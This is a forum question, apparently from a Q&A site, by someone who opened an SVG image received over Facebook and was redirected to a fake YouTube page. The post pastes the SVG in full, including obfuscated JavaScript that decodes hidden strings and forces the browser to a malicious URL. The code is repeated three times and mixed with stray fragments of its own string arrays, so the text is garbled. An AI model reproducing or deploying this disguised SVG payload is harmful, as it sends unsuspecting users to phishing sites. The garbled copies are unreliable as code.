I received a facebook message with two files (SVG images), and I clicked on one of them (I donβt know why :(). Then a new tab opened with a red dot, and then I was immediately redirected to some website, pretending to look like Youtube ( http://kerman.pw/?fb_dsa ).
Then I downloaded the .svg file using the "Save Link As ..." function. Some javascript code seems to be pouring into svg, so I post it here (I don't know JS very well):
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg"> <circle cx="250" cy="250" r="50" fill="red" /> <script type="text/javascript"><![CDATA[ function xcxxy(gyqbv,hzrgh,ktjrf){ var qixua = "XY_/3cU.ioGJkP2hgveS1Tj75ABb=Nrs:u?fKmdI0nLty84CRpVOzaFD9lZExMH6"; var vyqsvo = ["rYf=3vXU:zitl17N.k24ah8ZO6KoDFjPMEceRmsTGbdVBH59uJS\/I0g_CL?pxAyn","RN?dh38MCU0o6u=tIXPp.nZJzc5D:TiLFOvYfjG4E2K1A_rgaHykbS\/9lB7sexVm","n4mAObK9zBt_YZrcE1JHM.SF=dRT:6aDeUuIPi2vfhkGXp?y5LgVoCj0873lxN\/s","C981S?moMiHktu:nev0ZBzVh.2FONIcbxf7GYL6RgpUTAP4j_DJl\/dKa35rsX=Ey","9n?SGiTY6z8BjCbM:Lpsr0xZeUvPaH.JmfudtlE1\/y=kFODRKN24c5oX37_hAIVg",":z2oNO?Tr=aIx8.6gVeRn4_vYE5f1mZAXKltbuU7ByDSMis0Fk\/Pjch3CGLHJd9p"]; var bnkdip = ""; var igrqm = 0; while(vyqsvo[igrqm]){ igrqm++; } var kwwtmh = 0; while(gyqbv[kwwtmh]){ var jikaig = 0; var axfnq = -1; while(qixua[jikaig]){ if(qixua[jikaig] == gyqbv[kwwtmh]){ axfnq = jikaig; break; } jikaig++; } if(axfnq >= 0){ var abxnk = 0; var wjtfca = -1; while(vyqsvo[kwwtmh%igrqm][abxnk]){ if(vyqsvo[kwwtmh%igrqm][abxnk] == gyqbv[kwwtmh]){ wjtfca = abxnk; break; } abxnk++; } bnkdip += qixua[wjtfca]; }else{ bnkdip += gyqbv[kwwtmh]; } kwwtmh++; } var evhrt = ""; for(izqfrv=hzrgh;izqfrv<bnkdip.length;izqfrv++){ evhrt += bnkdip[izqfrv]; } bnkdip = evhrt; return bnkdip; } var obejok = window; var iyysri = xcxxy("sUTA:Gkb106SzH",11,false); var leizjp = xcxxy("kBB?5S:Uh",1,false); var nvanw = xcxxy(".Pi/MksB2n7jIta0d",13,false); obejok[iyysri][leizjp][nvanw] = xcxxy("siqnkSJFA1l=Eiz6YOzjADMk=1afJSUHcD",3,false); ]]></script> </svg> :? zitl17N.k24ah8ZO6KoDFjPMEceRmsTGbdVBH59uJS \ / I0g_CL pxAyn", "RN dh38MCU0o6u = tIXPp.nZJzc5D:? TiLFOvYfjG4E2K1A_rgaHykbS \ / 9lB7sexVm", "n4mAObK9zBt_YZrcE1JHM.SF = dRT: 6aDeUuIPi2vfhkGXp y5LgVoCj0873lxN \ / s?", " <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg"> <circle cx="250" cy="250" r="50" fill="red" /> <script type="text/javascript"><![CDATA[ function xcxxy(gyqbv,hzrgh,ktjrf){ var qixua = "XY_/3cU.ioGJkP2hgveS1Tj75ABb=Nrs:u?fKmdI0nLty84CRpVOzaFD9lZExMH6"; var vyqsvo = ["rYf=3vXU:zitl17N.k24ah8ZO6KoDFjPMEceRmsTGbdVBH59uJS\/I0g_CL?pxAyn","RN?dh38MCU0o6u=tIXPp.nZJzc5D:TiLFOvYfjG4E2K1A_rgaHykbS\/9lB7sexVm","n4mAObK9zBt_YZrcE1JHM.SF=dRT:6aDeUuIPi2vfhkGXp?y5LgVoCj0873lxN\/s","C981S?moMiHktu:nev0ZBzVh.2FONIcbxf7GYL6RgpUTAP4j_DJl\/dKa35rsX=Ey","9n?SGiTY6z8BjCbM:Lpsr0xZeUvPaH.JmfudtlE1\/y=kFODRKN24c5oX37_hAIVg",":z2oNO?Tr=aIx8.6gVeRn4_vYE5f1mZAXKltbuU7ByDSMis0Fk\/Pjch3CGLHJd9p"]; var bnkdip = ""; var igrqm = 0; while(vyqsvo[igrqm]){ igrqm++; } var kwwtmh = 0; while(gyqbv[kwwtmh]){ var jikaig = 0; var axfnq = -1; while(qixua[jikaig]){ if(qixua[jikaig] == gyqbv[kwwtmh]){ axfnq = jikaig; break; } jikaig++; } if(axfnq >= 0){ var abxnk = 0; var wjtfca = -1; while(vyqsvo[kwwtmh%igrqm][abxnk]){ if(vyqsvo[kwwtmh%igrqm][abxnk] == gyqbv[kwwtmh]){ wjtfca = abxnk; break; } abxnk++; } bnkdip += qixua[wjtfca]; }else{ bnkdip += gyqbv[kwwtmh]; } kwwtmh++; } var evhrt = ""; for(izqfrv=hzrgh;izqfrv<bnkdip.length;izqfrv++){ evhrt += bnkdip[izqfrv]; } bnkdip = evhrt; return bnkdip; } var obejok = window; var iyysri = xcxxy("sUTA:Gkb106SzH",11,false); var leizjp = xcxxy("kBB?5S:Uh",1,false); var nvanw = xcxxy(".Pi/MksB2n7jIta0d",13,false); obejok[iyysri][leizjp][nvanw] = xcxxy("siqnkSJFA1l=Eiz6YOzjADMk=1afJSUHcD",3,false); ]]></script> </svg> = Ey "," 9n SGiTY6z8BjCbM: Lpsr0xZeUvPaH.JmfudtlE1 \ / y = kFODRKN24c5oX37_hAIVg ",": z2oNO Tr = aIx8.6gVeRn4_vYE5f1mZAXKltbuU7ByDSMis0Fk \ / Pjch3CGLHJd9p "];?? <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg"> <circle cx="250" cy="250" r="50" fill="red" /> <script type="text/javascript"><![CDATA[ function xcxxy(gyqbv,hzrgh,ktjrf){ var qixua = "XY_/3cU.ioGJkP2hgveS1Tj75ABb=Nrs:u?fKmdI0nLty84CRpVOzaFD9lZExMH6"; var vyqsvo = ["rYf=3vXU:zitl17N.k24ah8ZO6KoDFjPMEceRmsTGbdVBH59uJS\/I0g_CL?pxAyn","RN?dh38MCU0o6u=tIXPp.nZJzc5D:TiLFOvYfjG4E2K1A_rgaHykbS\/9lB7sexVm","n4mAObK9zBt_YZrcE1JHM.SF=dRT:6aDeUuIPi2vfhkGXp?y5LgVoCj0873lxN\/s","C981S?moMiHktu:nev0ZBzVh.2FONIcbxf7GYL6RgpUTAP4j_DJl\/dKa35rsX=Ey","9n?SGiTY6z8BjCbM:Lpsr0xZeUvPaH.JmfudtlE1\/y=kFODRKN24c5oX37_hAIVg",":z2oNO?Tr=aIx8.6gVeRn4_vYE5f1mZAXKltbuU7ByDSMis0Fk\/Pjch3CGLHJd9p"]; var bnkdip = ""; var igrqm = 0; while(vyqsvo[igrqm]){ igrqm++; } var kwwtmh = 0; while(gyqbv[kwwtmh]){ var jikaig = 0; var axfnq = -1; while(qixua[jikaig]){ if(qixua[jikaig] == gyqbv[kwwtmh]){ axfnq = jikaig; break; } jikaig++; } if(axfnq >= 0){ var abxnk = 0; var wjtfca = -1; while(vyqsvo[kwwtmh%igrqm][abxnk]){ if(vyqsvo[kwwtmh%igrqm][abxnk] == gyqbv[kwwtmh]){ wjtfca = abxnk; break; } abxnk++; } bnkdip += qixua[wjtfca]; }else{ bnkdip += gyqbv[kwwtmh]; } kwwtmh++; } var evhrt = ""; for(izqfrv=hzrgh;izqfrv<bnkdip.length;izqfrv++){ evhrt += bnkdip[izqfrv]; } bnkdip = evhrt; return bnkdip; } var obejok = window; var iyysri = xcxxy("sUTA:Gkb106SzH",11,false); var leizjp = xcxxy("kBB?5S:Uh",1,false); var nvanw = xcxxy(".Pi/MksB2n7jIta0d",13,false); obejok[iyysri][leizjp][nvanw] = xcxxy("siqnkSJFA1l=Eiz6YOzjADMk=1afJSUHcD",3,false); ]]></script> </svg>
I really know javascript, so I wanted to ask, what can it do? Could it hurt me? Thank you very much